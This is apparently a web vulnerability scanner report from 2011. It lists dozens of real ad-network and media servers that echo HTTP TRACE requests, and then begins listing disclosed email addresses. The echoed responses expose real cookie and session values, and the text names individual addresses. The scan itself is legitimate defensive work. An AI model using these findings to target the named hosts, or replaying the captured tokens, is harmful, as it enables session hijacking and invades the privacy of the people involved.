Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.


19.1. http://72.3.253.234/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://72.3.253.234
Path:   /

Request

TRACE / HTTP/1.0
Host: 72.3.253.234
Cookie: 4f8d7c42314075d1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:19:14 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: 72.3.253.234
Cookie: 4f8d7c42314075d1; contextuads=97521578


19.2. http://ads.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 721c2c8ebe17f9a5

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 17 Sep 2011 01:13:02 GMT
Content-Type: message/http
Content-Length: 4614
Expires: Sat, 17 Sep 2011 01:13:02 GMT
Connection: close

TRACE / HTTP/1.0
Host: ads.pubmatic.com
Cookie: 721c2c8ebe17f9a5; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DD
...[SNIP]...

19.3. http://afe.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: afe.specificclick.net
Cookie: 65836463b1808848

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 149
Date: Sat, 17 Sep 2011 01:20:34 GMT
Connection: close

TRACE / HTTP/1.0
host: afe.specificclick.net
cookie: 65836463b1808848; JSESSIONID=4ec01f0c7202511a265d88b8398f; ADVIVA=NOTRACK; ug=RW048RW6W6E1FA

19.4. http://amch.questionmarket.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /

Request

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: fbb77ed6e1d80ae2

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:12 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: amch.questionmarket.com
Cookie: fbb77ed6e1d80ae2; CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-2; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-o
Connection: Keep-Alive


19.5. http://aud.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aud.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: aud.pubmatic.com
Cookie: b0213783f057324d

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:17:13 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: aud.pubmatic.com
Cookie: b0213783f057324d; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DD
...[SNIP]...

19.6. http://beta.abc.go.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://beta.abc.go.com
Path:   /

Request

TRACE / HTTP/1.0
Host: beta.abc.go.com
Cookie: d87e2a62fdb866fa

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:02:02 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: beta.abc.go.com
Cookie: d87e2a62fdb866fa; main=main5; SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYX
...[SNIP]...

19.7. http://bh.heraldinteractive.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.heraldinteractive.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bh.heraldinteractive.com
Cookie: 496f5ece0fdf4f8a

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:08 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch16
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bh.heraldinteractive.com
Cookie: 496f5ece0fdf4f8a; __qca=P0-1141638517-1316021781233


19.8. http://bigapple.contextuads.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bigapple.contextuads.com
Path:   /

Request

TRACE / HTTP/1.0
Host: bigapple.contextuads.com
Cookie: acb255e8f15af636

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:16:51 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: bigapple.contextuads.com
Cookie: acb255e8f15af636


19.9. http://bp.specificclick.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bp.specificclick.net
Path:   /

Request

TRACE / HTTP/1.0
Host: bp.specificclick.net
Cookie: eb143bd479810bd0

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: message/http
Content-Length: 107
Date: Sat, 17 Sep 2011 01:38:53 GMT
Connection: close

TRACE / HTTP/1.0
host: bp.specificclick.net
cookie: eb143bd479810bd0; ADVIVA=NOTRACK; ug=RW048RW6W6E1FA

19.10. http://cache.specificmedia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cache.specificmedia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cache.specificmedia.com
Cookie: c30268b6771b3947

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:21:32 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n8 ( origin>CONN)
Content-Length: 346
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
host: ads.specificmedia.com
user-agent: Mozilla/5.0 (compatible; Panther)
accept: */*
via: 1.1 lax-agg-n8.panthercdn.com PWS/1.7.3.3
x-forwarded-for: 50.23.123.106, 66.114.50.73
x-forwarded-ip: 50.23.123.106
x-initial-url: http://cache.specificmedia.com/
cookie: c30268b6771b3947; ADVIVA=NOTRACK
connection: keep-alive

19.11. http://cdn.video.abc.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.video.abc.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cdn.video.abc.com
Cookie: c8777c2dbd36b0bc

Response

HTTP/1.1 200 OK
Server: Footprint 4.8/FPMCP
Mime-Version: 1.0
Date: Sat, 17 Sep 2011 01:03:54 GMT
Content-Type: message/http
Content-Length: 109
Expires: Sat, 17 Sep 2011 01:03:54 GMT
Connection: close

TRACE / HTTP/1.0
Host: cdn.video.abc.com
Cookie: c8777c2dbd36b0bc
_FP_X_URL: http://cdn.video.abc.com/


19.12. http://cheetah.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cheetah.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: cheetah.vizu.com
Cookie: 953babd2de878f72

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:56 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n53 ( origin>CONN)
Content-Length: 505
Content-Type: message/http
Connection: close

TRACE /ie/ HTTP/1.1
Host: adcatalyst.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n53.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.51
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://cheetah.vizu.com/
Cookie: 953babd2de878f72; wtc=1812|teens|true&2446|networks|true; ptc=1812%3Ddevilphase4-1%3B2446%3D43589309-4_43589304-2_43589310-2_43589311-2_43589298-3_43589301-3_43589299-2%3B
Connection: keep-alive


19.13. http://dp.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: dp.33across.com
Cookie: ab8e4e0990151dfd

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:47 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: dp.33across.com
Cookie: ab8e4e0990151dfd; 33x_nc=33Across+Optout
X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


19.14. http://gallery.pictopia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gallery.pictopia.com
Path:   /

Request

TRACE / HTTP/1.0
Host: gallery.pictopia.com
Cookie: 80f3251f9fc26aaa

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 01:37:31 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from wc4-www.pictopia.com
Via: 1.1 wc4-www.pictopia.com:80 (squid/2.7.STABLE6)
Connection: close

TRACE / HTTP/1.0
Host: gallery.pictopia.com
Cookie: 80f3251f9fc26aaa; 1081_provcur=840; hbid=1622485993; ptp_ref_1081=http%3A//bostonherald.com/includes/processAds.bg%3Fposition%3DRight%26companion%3DTop%2CMiddle%2CMiddle1%2CRight%2CBottom%26page%3Dbh.heraldinteractive
...[SNIP]...

19.15. http://image2.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 825ffb2dc489868a

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:12:16 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 825ffb2dc489868a; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DD
...[SNIP]...

19.16. http://imp.fetchback.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /

Request

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 612f76d15f2b8e60

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:25 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: imp.fetchback.com
Cookie: 612f76d15f2b8e60; opt=1; cre=1_1316220738; kwd=1_1316220738; scg=1_1316220738; ppd=1_1316220738; act=1_1316220738; uid=1_1316220745_1316220738792:7409124710126868


19.17. http://mi.adinterax.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mi.adinterax.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 63346f2db7424752

Response

HTTP/1.1 200 OK
Server: Footprint 4.6/FPMCP
Mime-Version: 1.0
Date: Sat, 17 Sep 2011 00:52:20 GMT
Content-Type: message/http
Content-Length: 220
Expires: Sat, 17 Sep 2011 00:52:20 GMT
Connection: close

TRACE / HTTP/1.0
Host: mi.adinterax.com
Cookie: 63346f2db7424752; adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223.1071929@2@223.3078101@1@234
_FP_X_URL: http://mi.adinterax.com/


19.18. http://ping.crowdscience.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ping.crowdscience.com
Cookie: baec9267e7753e9a

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Content-Type: message/http
Date: Sat, 17 Sep 2011 01:36:55 GMT
Connection: close

TRACE / HTTP/1.0
X-Forwarded-Proto: http
Host: ping.crowdscience.com
X-Cluster-Client-Ip: 50.23.123.106
Cookie: baec9267e7753e9a; __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Connection: Keep-Alive


19.19. http://pixel.33across.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 42f8d0e5e24f65e3

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:53:28 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.33across.com
Cookie: 42f8d0e5e24f65e3; 33x_nc=33Across+Optout
X-Forwarded-For: 50.23.123.106
rlnclientipaddr: 50.23.123.106


19.20. http://puma.vizu.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /

Request

TRACE / HTTP/1.0
Host: puma.vizu.com
Cookie: 7e10108f9bc2ebfe

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:49 GMT
Server: PWS/1.7.3.3
X-Px: nc lax-agg-n53 ( origin>CONN)
Content-Length: 495
Content-Type: message/http
Connection: close

TRACE / HTTP/1.1
Host: origin.vizu.com
User-Agent: Mozilla/5.0 (compatible; Panther)
Accept: */*
Accept-Encoding: gzip
Via: 1.1 lax-agg-n53.panthercdn.com PWS/1.7.3.3
X-Forwarded-For: 50.23.123.106, 66.114.50.51
X-Forwarded-IP: 50.23.123.106
X-Initial-Url: http://puma.vizu.com/
Cookie: 7e10108f9bc2ebfe; wtc=1812|teens|true&2446|networks|true; ptc=1812%3Ddevilphase4-1%3B2446%3D43589309-4_43589304-2_43589310-2_43589311-2_43589298-3_43589301-3_43589299-2%3B
Connection: keep-alive


19.21. http://q1.checkm8.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://q1.checkm8.com
Path:   /

Request

TRACE / HTTP/1.0
Host: q1.checkm8.com
Cookie: 977fd5939dd4ab3e

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:09:50 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: q1.checkm8.com
Cookie: 977fd5939dd4ab3e; O=evV7X9wmgMMSg3IdGwNbO0jnBsnU3LcIba; A=dvV7X9w7R98LvENT06Sba; C=oR47X9w000YTchaQa4OQ95t; dt=97,20110913120144,OS=WIN7&FL=FL10&JE=1&UL=en&RES=RS21&CE=1315915303; R=cHONU9wbaaaaa%00%00%00aa


19.22. http://qa.n7.vp2.abc.go.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://qa.n7.vp2.abc.go.com
Path:   /

Request

TRACE / HTTP/1.0
Host: qa.n7.vp2.abc.go.com
Cookie: b2f697e7bcd2e65f

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:03:51 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: qa.n7.vp2.abc.go.com
Cookie: b2f697e7bcd2e65f; SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm
...[SNIP]...

19.23. http://rt.legolas-media.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 3c7131acb73c6470

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:08:15 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: 3c7131acb73c6470; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgsp=eV/lKTwBeV98GzwB; lgpr=yVfKV85Xz1cWYNFXeV+kWKVYx1c=; lgtix=NQARAEABBgABADMBSQABADMBHAAoADUBDAABADMB/QADADYBXwABADMB


19.24. http://sensor2.suitesmart.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 5e262d65ece15244

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:46 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sensor2.suitesmart.com
Cookie: 5e262d65ece15244; G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c; G14853=C1S98373-1-0-0-0-1315398787-0; G15493=C1S99917-3-0-0-0-1315313090-907675


19.25. http://t.mookie1.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /

Request

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f4e19cbeca247550

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:58:34 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: t.mookie1.com
Cookie: f4e19cbeca247550; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3; id=; mdata=; OAX=
Connection: Keep-Alive
MIG_IP: 50.23.123.106


19.26. http://track.pubmatic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://track.pubmatic.com
Path:   /

Request

TRACE / HTTP/1.0
Host: track.pubmatic.com
Cookie: a3929298b009ea5d

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:14:02 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: track.pubmatic.com
Cookie: a3929298b009ea5d; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DD
...[SNIP]...

19.27. http://usadmm.dotomi.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /

Request

TRACE / HTTP/1.0
Host: usadmm.dotomi.com
Cookie: f9135d0f61658efd

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:48:37 GMT
Server: Apache/2.2.20 (Unix) DAV/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: usadmm.dotomi.com
Cookie: f9135d0f61658efd; DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5


19.28. http://widgets.outbrain.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: widgets.outbrain.com
Cookie: d7edb4d57c0f616c

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:57:11 GMT
Server: Apache
Content-Type: message/http
Accept-Ranges: bytes
Connection: close

TRACE / HTTP/1.1
Cookie: d7edb4d57c0f616c; obuid=7a957d2b-640c-464a-8acd-8219f3607c99; _lvs2="7o9zvLIDBgZ/PDZJG4J4VcCxVx+pz+vfyPm975gFPm+3JT8CAr5BQAcO/CD2iJ2OomCz617Au40="; _rcc2=H6lta0Gb5dPegbOhXE7G4uRdkwHPmlC5; _lvd2="VhDI5DVoPO+Zv2X+or5DaP
...[SNIP]...

19.29. http://www.4info.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.4info.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.4info.com
Cookie: 9db886bea6b88415

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:50:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.4info.com
Cookie: 9db886bea6b88415


19.30. http://www.kaltura.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaltura.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.kaltura.com
Cookie: 2bce2005f3462a1

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:03 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.kaltura.com
Cookie: 2bce2005f3462a1


19.31. https://www.mailjet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.mailjet.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.mailjet.com
Cookie: 1a6c22de6f542f25

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 21:55:02 GMT
Server: MJWS/1.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.mailjet.com
Cookie: 1a6c22de6f542f25; affiliate=US-EN-smtp; __utma=176514170.637056612.1316204845.1316216714.1316228159.3; __utmc=176514170; __utmz=176514170.1316228159.3.3.utmgclid=CKqV0feJoqsCFQdzgwod6j2wjw|utmccn=(not%20set)|utmcmd=(n
...[SNIP]...

19.32. http://www.tmz.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: c29c058ee7f73535

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:51:56 GMT
Server: Apache
Connection: close
Content-Type: message/http
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

TRACE / HTTP/1.0
Host: www.tmz.com
Cookie: c29c058ee7f73535; SERVERID=
X-Forwarded-For: 50.23.123.106


20. Email addresses disclosed  previous  next
There are 95 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


20.1. http://a.abc.com/service/gremlin/js/files/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.abc.com
Path:   /service/gremlin/js/files/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /service/gremlin/js/files/s_code.js HTTP/1.1
Host: a.abc.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 30299
Content-Type: text/javascript
Last-Modified: Wed, 14 Sep 2011 22:05:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abcmed10
X-Powered-By: ASP.NET
Cache-Expires: Wed, 14 Sep 2011 23:05:41 GMT
X-UA-Compatible: IE=EmulateIE7
Cache-Control: max-age=421703
Date: Sat, 17 Sep 2011 00:57:22 GMT
Connection: close


/**
* @filepath: s_code
* @created: Wed, 14 Sep 11 15:04:06 -0700
*/


/**
* @filepath: /s_code.js
* @created: Wed, 14 Sep 11 14:59:10 -0700
*/
/* SiteCatalyst code version: H.16.
Copyright 1997-2
...[SNIP]...
.hav()+q+(qs?qs:s.rq(^C)),0,id,ta);qs`e;`Wm"
+"('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@h;`l@h`L^9,`G$61',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$w)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Btc=1;s.flush`a()}`2$l`Atl`0o,t,n,"
+"vo`1;s.@G=@vo`R`N^M=t;s.`N`i=n;s.t(@h}`5pg){`F@0co`0o){`K@J\"_\",1,#A`2@vo)`Awd@0gs`0$S{`K@J$o1,#A`2s.t()`Awd@0dc`0$S{`K@J$o#A`2s.t()}}@3=(`F`J`Y`8`4@ts@d0`Rd=^L;
...[SNIP]...

20.2. http://advancedvoip.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advancedvoip.com
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: advancedvoip.com
Proxy-Connection: keep-alive
Referer: http://www.radius-server.net/aradial-radius-server-billing-partners-inner.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 29520
Content-Type: text/html
Content-Location: http://advancedvoip.com/index.html
Last-Modified: Wed, 22 Jun 2011 22:14:48 GMT
Accept-Ranges: bytes
ETag: "def0efcc2931cc1:48f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 16 Sep 2011 19:47:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...
<a href="mailto:sales@AdvancedVoIP.com">sales@AdvancedVoIP.com</a>
...[SNIP]...
<a href="mailto:sales@advancedvoip.com">
...[SNIP]...

20.3. http://bostonherald.com/news/regional/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /news/regional/view.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /news/regional/view.bg?articleid=1366356&position=1 HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bhfont=12; OAX=Mhd7ak5wnrsADfhS; __qca=P0-565564501-1316021626456; __utma=1.1358113657.1316021626.1316021626.1316021626.1; __utmz=1.1316021626.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RMFD=011R4jGHO101yed8|O1021J7A; __utma=235728274.611537932.1316021623.1316021623.1316239291.2; __utmb=235728274.3.10.1316239294; __utmc=235728274; __utmz=235728274.1316021623.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:00:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51603

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="http://ogp.me/ns#" xmln
...[SNIP]...
<div id="articleTagline" style="display:block">-&mdash; ojohnson@bostonherald.com</div>
...[SNIP]...

20.4. http://bostonherald.com/projects/your_tax_dollars.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bostonherald.com
Path:   /projects/your_tax_dollars.bg

Issue detail

The following email address was disclosed in the response:

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: bostonherald.com
Proxy-Connection: keep-alive
Referer: http://bostonherald.com/entertainment/
